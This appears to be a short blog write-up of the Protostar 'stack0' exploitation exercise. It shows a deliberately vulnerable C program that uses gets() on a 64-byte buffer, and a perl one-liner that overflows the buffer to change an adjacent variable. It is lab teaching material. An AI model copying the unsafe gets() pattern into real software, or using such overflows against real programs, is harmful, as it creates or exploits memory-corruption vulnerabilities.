Protostar exploits stack0

Introduction

Protostar exploits are a cool bunch of ctf type exercises that focus on Linux  binary exploits that progressively get harder. A ISO containing the OS and challenges can be downloaded.

The website with all information and downloads is at https://exploit-exercises.com/protostar/

Challenge

Test run

user@protostar:~$ /opt/protostar/bin/stack0
test
Try again?

Exploit

Make the program respond with the message “you have changed the ‘modified’ variable”.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
 volatile int modified;
 char buffer[64];

 modified = 0;
 gets(buffer);

 if(modified != 0) {
 printf("you have changed the 'modified' variable\n");
 } else {
 printf("Try again?\n");
 }
}

We can see the challenge statement will be displayed if the ‘modified’ variable is not zero.

Can we corrupt the memory stack using the gets(buffer) call and overwrite the modified variable?

Let’s see

user@protostar:~$ perl -e 'print "A"x65'|/opt/protostar/bin/stack0
you have changed the 'modified' variable

Using perl we were able to overflow the buffer where ‘buffer’ variable was being stored. We wrote out 65 A’s to stdout and this was one byte more than was allocated and must have hit the ‘modified’ variable.

I won’t go into more detail because this was simple and the latter challenges will take up more time.

Thank you

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s